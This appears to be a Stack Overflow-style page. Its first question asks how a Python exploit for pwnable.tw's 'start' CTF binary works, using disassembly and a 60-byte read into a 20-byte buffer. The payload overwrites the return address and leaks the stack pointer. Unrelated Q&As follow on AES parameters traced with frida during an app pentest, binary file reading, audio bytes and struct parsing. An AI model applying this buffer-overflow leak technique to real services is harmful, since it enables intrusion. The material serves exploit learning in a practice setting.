Exploiting system calls in assembly - python

I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided disassembled binary looks like this:
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 push 0x20656874
8048078: 68 61 72 74 20 push 0x20747261
804807d: 68 73 20 73 74 push 0x74732073
8048082: 68 4c 65 74 27 push 0x2774654c
8048087: 89 e1 mov ecx,esp ; buffer = $esp
8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
8048093: b2 3c mov dl,0x3c ; count = 0x3c (60)
8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
8048099: 83 c4 14 add esp,0x14
804809c: c3 ret
0804809d <_exit>:
804809d: 5c pop esp
804809e: 31 c0 xor eax,eax
80480a0: 40 inc eax ; system call = 1 (sys_exit)
80480a1: cd 80 int 0x80 ; call sys_exit
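As far as I can tell, read as rough pseudocode the binary does the following (a sketch of the control flow, not literal code); the key point is that sys_read may write up to 60 bytes into a 20-byte stack buffer that sits directly below the saved return address:
# push esp                      -> saves the original stack pointer on the stack
# push 0x804809d                -> pushes the address of _exit as the eventual return address
# push "Let's start the CTF:"   -> builds a 20-byte banner with five pushes
write(1, esp, 0x14)             # sys_write(fd=1, buf=esp, count=20): prints the banner
read(0, esp, 0x3c)              # sys_read(fd=0, buf=esp, count=60): 60 bytes into a 20-byte buffer
# add esp, 0x14                 -> drops the banner; esp now points at the return slot
# ret                           -> pops that dword and jumps to it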
Several writeups (1, 2, and 3) point out that the solution lies in leaking the stack address held in esp (and moved into ecx) by exploiting the mismatched count values of sys_write (0x14) and sys_read (0x3c). This way, we can overwrite the return address with 0x8048087 so that the program loops and prints the stack contents at esp.
However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?
from socket import *
from struct import *
c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))
# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.
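My current understanding of that first payload, as an annotated sketch (addresses as in the disassembly above; this only covers the leak stage, not a full solution):
from struct import pack

# Same payload as in the snippet above, annotated byte by byte.
payload = 'x' * 20 + pack('<I', 0x08048087)
#   bytes  0..19 : filler that fills the 20-byte "Let's start the CTF:" buffer
#   bytes 20..23 : 0x08048087, overwriting the pushed _exit address that ret pops
#
# After `add esp,0x14; ret`, execution resumes at 0x8048087 (mov ecx,esp).
# esp then points at the dword stored by the very first `push esp`, so the
# re-executed sys_write(1, esp, 0x14) sends 20 bytes of stack data whose first
# 4 bytes are that saved esp value, which is exactly what
# `unpack('<I', c.recv(0x100)[:4])[0]` extracts.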

Related

Python Crypto AES 128 with PKCS7Padding different outputs from Swift vs Python

The output is produced by crypto with the following key
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
and the
message = "y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5"
My IV object looks like this:
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
Objective C CCCrypt produces the following hash 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
It appears to be using kCCAlgorithmAES128 with PKCS7Padding and the key provided above.
I'm trying to implement the same crypto encode functionality to get an output like 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
This is what I've been able to put so far
import base64
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES

class MyCrypt():
    def __init__(self, key, iv):
        self.key = key
        self.iv = iv
        self.mode = AES.MODE_CBC

    def encrypt(self, text):
        cryptor = AES.new(self.key, self.mode, self.iv)
        text = pad(text, 16)
        self.ciphertext = cryptor.encrypt(text)
        return self.ciphertext

key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')
IV = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
plainText = 'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'.encode('utf-8')
crypto = MyCrypt(key, IV)
encrypt_data = crypto.encrypt(plainText)
encoder = base64.b64encode(encrypt_data)
print(encrypt_data, encoder)
This produces the following output Pi3yzpoVhax0Cul1VkYoyYCivZrEliTDBpDbqZ3dD1bwTUycstAF+MLSTIjSMiQj instead of 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
Which isn't my desired output.
Should I not be using MODE_ECB, or am I using the key as intended?
To add more context
I'm new to Crypto / Objective C.
I'm currently pentesting an app, which does some hashing behind the scenes.
Using frida I'm tracing these function calls, and I see the following get populated for the Swift/ObjC calls.
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x2814bd890, inLength: 0x58, outBuffer: 0x16f1c5d90, outLength: 0x60, outCountPtr: 0x16f1c5e10)
Where
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x280e41530, inLength: 0x2f, outBuffer: 0x16f1c56c0, outLength: 0x30, outCountPtr: 0x16f1c5710)
In buffer:
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
280e41530 79 5f 64 65 76 69 63 65 3d 79 5f 43 39 44 42 36 y_device=y_C9DB6
280e41540 30 32 45 2d 30 45 42 37 2d 34 46 46 34 2d 38 33 02E-0EB7-4FF4-83
280e41550 31 45 2d 38 44 41 38 43 45 45 30 42 42 46 35 1E-8DA8CEE0BBF5
Key: 16 47
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8639 3f 2c 59 3b 7d 46 96 02 af 5a 6f b7 18 bc 92 cc ?,Y;}F...Zo.....
IV: 16
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8649 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
I use https://opensource.apple.com/source/CommonCrypto/CommonCrypto-36064/CommonCrypto/CommonCryptor.h to work out the type of encryption happening based on the arguments, e.g. for the Options argument the value 0x1 is passed.
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
Nope, that's 32 bytes. It's true that only 16 are non-zero, making a really poor key, but if you pass 256 bits, you are doing AES-256, and you'll get a different result than you would from AES-128 using the first 128 bits of that key.
Your title mentions PKCS #7 padding, but it looks like your code is padding with zeros. That will change the results as well.
ECB doesn't use an IV. If you can see that the Swift code is using the IV, you might be able to see what mode it's using too, or you could try CBC as a first guess. ECB is insecure in most cases. Of course, using a fixed IV is also insecure.
Your output is longer than it should be (64 bytes instead of 48). Your attempt to do the padding yourself is probably responsible for this.
From <CommonCryptor.h>, we can decode the parameters used in Swift's call to CCCrypt:
Type          Value   Name                    Comment
CCOperation   0x0     kCCEncrypt              Symmetric encryption.
CCAlgorithm   0x0     kCCAlgorithmAES128      Advanced Encryption Standard, 128-bit block
CCOptions     0x1     kCCOptionPKCS7Padding   Perform PKCS7 padding.
CCOptions     0x2     kCCOptionECBMode        Electronic Code Book Mode. Default is CBC.
CCOptions is a bit field, and kCCOptionECBMode is not set, so the default is used.
So this is AES-128 in CBC mode with PKCS #7 padding.
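Putting that together, a minimal PyCryptodome sketch matching those CCCrypt parameters would be (untested here; the key truncation to the first 16 bytes is the important difference from your code):
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')[:16]  # 16 bytes -> AES-128
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')                            # 16 zero bytes
plaintext = b'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'               # 47 bytes

cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))  # PKCS #7 pads 47 -> 48 bytes
print(len(ciphertext))                # 48
print(base64.b64encode(ciphertext))   # compare against the Objective-C output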

Difference in result while reading same file with node and python

I have been trying to read the contents of the genesis.block given in this file of the Node SDK in Hyperledger Fabric using Python. However, whenever I try to read the file with Python by using
data = open("twoorgs.genesis.block").read()
The value of the data variable is as follows:
>>> data
'\n'
With nodejs using fs.readFileSync() I obtain an instance of Buffer() for the same file.
var data = fs.readFileSync('./twoorgs.genesis.block');
The result is
> data
<Buffer 0a 22 1a 20 49 63 63 ac 9c 9f 3e 48 2c 2c 6b 48 2b 1f 8b 18 6f a9 db ac 45 07 29 ee c0 bf ac 34 99 9e c2 56 12 e1 84 01 0a dd 84 01 0a d9 84 01 0a 79 ... >
How can I read this file successfully using Python?
Your file has a 1a in it. This is Ctrl-Z, which is treated as end of file on Windows when a file is read in text mode.
So try binary mode like:
data = open("twoorgs.genesis.block", 'rb').read()

Python: convert hex bytestream to "int16"

So I'm working with incoming audio from Watson Text to Speech. I want to play the sound immediately when data arrives to Python with a websocket from nodeJS.
This is an example of the data I'm sending with the websocket:
<Buffer e3 f8 28 f9 fa f9 5d fb 6c fc a6 fd 12 ff b3 00 b8 02 93 04 42 06 5b 07 e4 07 af 08 18 0a 95 0b 01 0d a2 0e a4 10 d7 12 f4 12 84 12 39 13 b0 12 3b 13 ... >
So the data arrives as a hex bytestream and I try to convert it to something that Sounddevice can read/play. (See documentation: The types 'float32', 'int32', 'int16', 'int8' and 'uint8' can be used for all streams and functions.) But how can I convert this?
I already tried something, but when I run my code I only hear some noise, nothing recognizable.
Here you can read some parts of my code:
def onMessage(self, payload, isBinary):
    a = payload.encode('hex')
    queue.put(a)
After I receive the bytestream and convert it to hex, I try to send the incoming data to Sounddevice:
def stream_audio():
    with sd.OutputStream(channels=1, samplerate=24000, dtype='int16', callback=callback):
        sd.sleep(int(20 * 1000))

def callback(outdata, frames, time, status):
    global reststuff, i, string
    LENGTH = frames
    while len(reststuff) < LENGTH:
        a = queue.get()
        reststuff += a

    returnstring = reststuff[:LENGTH]
    reststuff = reststuff[LENGTH:]

    for char in returnstring:
        i += 1
        string += char
        if i % 2 == 0:
            print string
            outdata[:] = int(string, 16)
            string = ""
look at your stream of data:
e3 f8 28 f9 fa f9 5d fb 6c fc a6 fd 12 ff b3 00
b8 02 93 04 42 06 5b 07 e4 07 af 08 18 0a 95 0b
01 0d a2 0e a4 10 d7 12 f4 12 84 12 39 13 b0 12
3b 13
You can see that in every pair of bytes, the second one starts with e/f/0/1, which means a value near zero (in two's complement).
So those are your most significant bytes, and your stream is little-endian!
You should take that into account in your conversion.
If I had more data I would have tested it, but this is worth a few milliseconds!
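As an illustration (a numpy sketch, not your exact pipeline), the raw bytes can be interpreted as little-endian signed 16-bit samples, which is what a sounddevice 'int16' output stream expects:
import numpy as np

payload = b'\xe3\xf8\x28\xf9\xfa\xf9\x5d\xfb'   # first 8 bytes of the stream above
samples = np.frombuffer(payload, dtype='<i2')   # '<i2' = little-endian int16
print(samples)                                  # [-1821 -1752 -1542 -1187]
In the callback, something like samples.reshape(-1, 1) could then be copied into outdata instead of building hex strings by hand.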

Write null bytes in a file instead of correct strings

I have a python script that processes a data file:
out = open('result/process/'+name+'.res','w')
out.write("source,rssi,lqi,packetId,run,counter\n")
f = open('result/resultat0.res','r')
for ligne in [x for x in f if x != '']:
    chaine = ligne.rstrip('\n')
    tmp = chaine.split(',')
    if len(tmp) == 6:
        out.write(','.join(tmp)+"\n")
f.close()
The complete code is here
I use this script on several computers and the behavior is not the same.
On the first computer, with python 2.6.6, the result is what I expect.
However, on the others (python 2.6.6, 3.3.2, 2.7.5) the write method of the file object writes null bytes instead of the values I want for most of the processing. I get this result:
$ hexdump -C result/process/1.res
00000000 73 6f 75 72 63 65 2c 72 73 73 69 2c 6c 71 69 2c |source,rssi,lqi,|
00000010 70 61 63 6b 65 74 49 64 2c 72 75 6e 2c 63 6f 75 |packetId,run,cou|
00000020 6e 74 65 72 0a 00 00 00 00 00 00 00 00 00 00 00 |nter............|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
0003a130 00 00 00 00 00 00 00 00 00 00 31 33 2c 36 35 2c |..........13,65,|
0003a140 31 34 2c 38 2c 39 38 2c 31 33 31 34 32 0a 31 32 |14,8,98,13142.12|
0003a150 2c 34 37 2c 31 37 2c 38 2c 39 38 2c 31 33 31 34 |,47,17,8,98,1314|
0003a160 33 0a 33 2c 34 35 2c 31 38 2c 38 2c 39 38 2c 31 |3.3,45,18,8,98,1|
0003a170 33 31 34 34 0a 31 31 2c 38 2c 32 33 2c 38 2c 39 |3144.11,8,23,8,9|
0003a180 38 2c 31 33 31 34 35 0a 39 2c 32 30 2c 32 32 2c |8,13145.9,20,22,|
Do you have any idea how to resolve this problem, please?
With the following considerations:
In over a decade of programming python, I've never come across a compelling reason to use global. Pass arguments to functions instead.
For ensuring files are closed when finished with, use the with statement.
Here's an (untested) attempt at refactoring your code for sanity; it assumes that you have enough memory available to hold all of the lines under a particular identifier.
If you still have null bytes in your result files after this refactoring, then we have a reasonable basis to proceed with debugging.
import os
import re
from contextlib import closing

def list_files_to_process(directory='results'):
    """
    Return a list of files from directory where the file extension is '.res',
    case insensitive.
    """
    results = []
    for filename in os.listdir(directory):
        filepath = os.path.join(directory, filename)
        if os.path.isfile(filepath) and filename.lower().endswith('.res'):
            results.append(filepath)
    return results

def group_lines(sequence):
    """
    Generator, process a sequence of lines, separated by a particular line.
    Yields batches of lines along with the id from the separator.
    """
    separator = re.compile('^A:(?P<id>\d+):$')
    batch = []
    batch_id = None
    for line in sequence:
        if not line:  # Ignore blanks
            continue
        m = separator.match(line)
        if m is not None:
            if batch_id is not None or len(batch) > 0:
                yield (batch_id, batch)
            batch_id = m.group('id')
            batch = []
        else:
            batch.append(line)
    if batch_id is not None or len(batch) > 0:
        yield (batch_id, batch)

def filename_for_results(batch_id, result_directory):
    """
    Return an appropriate filename for a batch_id under the result directory
    """
    return os.path.join(result_directory, "results-%s.res" % (batch_id,))

def open_result_file(filename, header="source,rssi,lqi,packetId,run,counter"):
    """
    Return an open file object in append mode, having appended a header if
    filename doesn't exist or is empty
    """
    if os.path.exists(filename) and os.path.getsize(filename) > 0:
        # No need to write header
        return open(filename, 'a')
    else:
        f = open(filename, 'a')
        f.write(header + '\n')
        return f

def process_file(filename, result_directory='results/processed'):
    """
    Open filename and process its contents. Uses group_lines() to group
    lines into different files based upon a specific line acting as a
    content separator.
    """
    error_filename = filename_for_results('error', result_directory)
    with open(filename, 'r') as in_file, open(error_filename, 'w') as error_out:
        for batch_id, lines in group_lines(in_file):
            if len(lines) == 0:
                error_out.write("Received batch %r with 0 lines" % (batch_id,))
                continue
            out_filename = filename_for_results(batch_id, result_directory)
            with closing(open_result_file(out_filename)) as out_file:
                for line in lines:
                    if line.startswith('L') and line.endswith('E') and line.count(',') == 5:
                        line = line.lstrip('L').rstrip('E')
                        out_file.write(line + '\n')
                    else:
                        error_out.write("Unknown line, batch=%r: %r\n" % (batch_id, line))

if __name__ == '__main__':
    files = list_files_to_process()
    for filename in files:
        print "Processing %s" % (filename,)
        process_file(filename)

Python binary data reading

A urllib2 request receives a binary response, as below:
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
Its structure is:
DATA, TYPE, DESCRIPTION
00 00 00 01, 4 bytes, Symbol Count =1
00 04, 2 bytes, Symbol Length = 4
41 4D 54 44, 6 bytes, Symbol = AMTD
00, 1 byte, Error code = 0 (OK)
00 00 00 02, 4 bytes, Bar Count = 2
FIRST BAR
41 97 33 33, 4 bytes, Close = 18.90
41 99 5C 29, 4 bytes, High = 19.17
41 90 3D 71, 4 bytes, Low = 18.03
41 91 D7 0A, 4 bytes, Open = 18.23
47 0F C6 14, 4 bytes, Volume = 3,680,608
00 00 01 16 6A E0 68 80, 8 bytes, Timestamp = November 23,2007
SECOND BAR
41 93 B4 05, 4 bytes, Close = 18.4629
41 97 1E B8, 4 bytes, High = 18.89
41 90 7A E1, 4 bytes, Low = 18.06
41 96 8F 57, 4 bytes, Open = 18.82
46 E6 2E 80, 4 bytes, Volume = 2,946,325
00 00 01 16 7A 53 7C 80, 8 bytes, Timestamp = November 26,2007
TERMINATOR
FF FF, 2 bytes,
How to read binary data like this?
Thanks in advance.
Update:
I tried the struct module on the first 6 bytes with the following code:
struct.unpack('ih', response.read(6))
(16777216, 1024)
But it should output (1, 4). I took a look at the manual but have no clue what is wrong.
So here's my best shot at interpreting the data you're giving...:
import datetime
import struct

class Printable(object):
    specials = ()
    def __str__(self):
        resultlines = []
        for pair in self.__dict__.items():
            if pair[0] in self.specials: continue
            resultlines.append('%10s %s' % pair)
        return '\n'.join(resultlines)

head_fmt = '>IH6sBH'
head_struct = struct.Struct(head_fmt)

class Header(Printable):
    specials = ('bars',)
    def __init__(self, symbol_count, symbol_length,
                 symbol, error_code, bar_count):
        self.__dict__.update(locals())
        self.bars = []
        del self.self

bar_fmt = '>5fQ'
bar_struct = struct.Struct(bar_fmt)

class Bar(Printable):
    specials = ('header',)
    def __init__(self, header, close, high, low,
                 open, volume, timestamp):
        self.__dict__.update(locals())
        self.header.bars.append(self)
        del self.self
        self.timestamp /= 1000.0
        self.timestamp = datetime.date.fromtimestamp(self.timestamp)

def showdata(data):
    terminator = '\xff' * 2
    assert data[-2:] == terminator
    head_data = head_struct.unpack(data[:head_struct.size])
    try:
        assert head_data[4] * bar_struct.size + head_struct.size == \
               len(data) - len(terminator)
    except AssertionError:
        print 'data length is %d' % len(data)
        print 'head struct size is %d' % head_struct.size
        print 'bar struct size is %d' % bar_struct.size
        print 'number of bars is %d' % head_data[4]
        print 'head data:', head_data
        print 'terminator:', terminator
        print 'so, something is wrong, since',
        print head_data[4] * bar_struct.size + head_struct.size, '!=',
        print len(data) - len(terminator)
        raise

    head = Header(*head_data)
    for i in range(head.bar_count):
        bar_substr = data[head_struct.size + i * bar_struct.size:
                          head_struct.size + (i+1) * bar_struct.size]
        bar_data = bar_struct.unpack(bar_substr)
        Bar(head, *bar_data)
    assert len(head.bars) == head.bar_count

    print head
    for i, x in enumerate(head.bars):
        print 'Bar #%s' % i
        print x

datas = '''
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
'''

data = ''.join(chr(int(x, 16)) for x in datas.split())
showdata(data)
this emits:
symbol_count 1
bar_count 2
symbol AMTD
error_code 0
symbol_length 4
Bar #0
volume 36806.078125
timestamp 2007-11-22
high 19.1700000763
low 18.0300006866
close 18.8999996185
open 18.2299995422
Bar #1
volume 29463.25
timestamp 2007-11-25
high 18.8899993896
low 18.0599994659
close 18.4629001617
open 18.8199901581
...which seems to be pretty close to what you want, net of some output formatting details. Hope this helps!-)
>>> data
'\x00\x00\x00\x01\x00\x04AMTD\x00\x00\x00\x00\x02A\x9733A\x99\\)A\x90=qA\x91\xd7\nG\x0f\xc6\x14\x00\x00\x01\x16j\xe0h\x80A\x93\xb4\x05A\x97\x1e\xb8A\x90z\xe1A\x96\x8fWF\xe6.\x80\x00\x00\x01\x16zS|\x80\xff\xff'
>>> from struct import unpack, calcsize
>>> scount, slength = unpack("!IH", data[:6])
>>> assert scount == 1
>>> symbol, error_code = unpack("!%dsb" % slength, data[6:6+slength+1])
>>> assert error_code == 0
>>> symbol
'AMTD'
>>> bar_count = unpack("!I", data[6+slength+1:6+slength+1+4])
>>> bar_count
(2,)
>>> bar_format = "!5fQ"
>>> from collections import namedtuple
>>> Bar = namedtuple("Bar", "Close High Low Open Volume Timestamp")
>>> b = Bar(*unpack(bar_format, data[6+slength+1+4:6+slength+1+4+calcsize(bar_format)]))
>>> b
Bar(Close=18.899999618530273, High=19.170000076293945, Low=18.030000686645508, Open=18.229999542236328, Volume=36806.078125, Timestamp=1195794000000L)
>>> import time
>>> time.ctime(b.Timestamp//1000)
'Fri Nov 23 08:00:00 2007'
>>> int(b.Volume*100 + 0.5)
3680608
>>> struct.unpack('ih', response.read(6))
(16777216, 1024)
You are unpacking big-endian data on a little-endian machine. Try this instead:
>>> struct.unpack('!IH', response.read(6))
(1L, 4)
This tells unpack to consider the data in network order (big-endian). Also, counts and lengths cannot be negative, so you should use the unsigned variants in your format string.
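To see where your numbers come from, here is a small sketch (assuming a little-endian machine, as in your case):
import struct

data = '\x00\x00\x00\x01\x00\x04'
print struct.unpack('ih', data)    # native little-endian, signed          -> (16777216, 1024)
print struct.unpack('!IH', data)   # network order (big-endian), unsigned  -> (1, 4)
16777216 is 0x01000000 and 1024 is 0x0400, i.e. the same bytes read in the opposite order.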
Take a look at struct.unpack in the struct module.
Use the pack/unpack functions from the "struct" package. More info here: http://docs.python.org/library/struct.html
Bye!
As it was already mentioned, struct is the module you need to use.
Please read its documentation to learn about byte ordering, etc.
In your example you need to do the following (as your data is big-endian and unsigned):
>>> import struct
>>> x = '\x00\x00\x00\x01\x00\x04'
>>> struct.unpack('>IH', x)
(1, 4)
